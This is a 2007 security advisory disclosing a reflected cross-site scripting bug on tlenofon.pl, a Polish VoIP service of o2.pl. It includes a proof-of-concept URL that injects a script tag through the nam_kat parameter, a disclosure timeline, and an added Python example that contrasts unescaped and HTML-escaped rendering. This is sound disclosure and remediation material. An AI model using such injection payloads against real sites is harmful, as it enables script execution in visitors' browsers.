kaneda@bohater.net

+ Subject:
XSS bug for www.tlenofon.pl

+ Version:
2007.03.04

+ Discovered by:
Kanedaaa: http://kaneda.bohater.net

+ tlenofon.pl Description:
www.tlenofon.pl is a "VoIP application service", part of o2.pl, the most famous Polish web portal.

+ Description:
XSS IN:
http://www.tlenofon.pl/index.php?dzial=faq&nr_kat=1&nam_kat=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3EWymagania%20techniczne,%20jak%20zacz%B1%E6%20i%20problemy%20z%20logowaniem

It's nothing special, because this site has no authentication of any kind.
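
The fix for this class of bug is to HTML-encode nam_kat before it is written into the page. The sketch below is an added example, not code from tlenofon.pl or from the original advisory: it decodes the URL above (the %B1 and %E6 bytes are ISO-8859-2) and renders the value with and without encoding. The TEMPLATE markup and the function names are assumptions, since the page source is not shown here.

```python
import html
from urllib.parse import urlsplit, parse_qs

# URL exactly as given in the advisory.
ADVISORY_URL = (
    "http://www.tlenofon.pl/index.php?dzial=faq&nr_kat=1&nam_kat="
    "%22%3E%3Cscript%3Ealert('XSS')%3C/script%3EWymagania%20techniczne,"
    "%20jak%20zacz%B1%E6%20i%20problemy%20z%20logowaniem"
)


def get_param(url, name, encoding="iso-8859-2"):
    """Return the decoded value of one query parameter.

    The %B1 and %E6 bytes in the advisory URL are ISO-8859-2 (Polish),
    so that charset is used here instead of the UTF-8 default.
    """
    query = urlsplit(url).query
    return parse_qs(query, encoding=encoding, errors="strict")[name][0]


# Assumed template: the value lands in an attribute and in element text.
TEMPLATE = '<input type="hidden" name="kat" value="{}"><h2>{}</h2>'


def render_unsafe(value):
    """Reflect the parameter verbatim (the behaviour the advisory reports)."""
    return TEMPLATE.format(value, value)


def render_safe(value):
    """Encode &, <, >, " and ' before the value reaches the HTML."""
    escaped = html.escape(value, quote=True)
    return TEMPLATE.format(escaped, escaped)


if __name__ == "__main__":
    nam_kat = get_param(ADVISORY_URL, "nam_kat")
    print("unsafe:", render_unsafe(nam_kat))
    print("safe:  ", render_safe(nam_kat))
```

In the unsafe output the leading `">` closes the attribute and the tag, so the script element becomes live markup; in the safe output the same characters arrive as entities and the category name is displayed as text.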



+ Timeline:
2007.03.04 bug discovered
2007.03.04 bug sent via mail from http://kontakt.o2.pl
2007.03.15 response from kontakt.o2.pl - promise about fix and...
2007.03.30 still not fixed

Original Advisory: http://kaneda.bohater.net/security/20070304-xss-tlenofon.pl.php
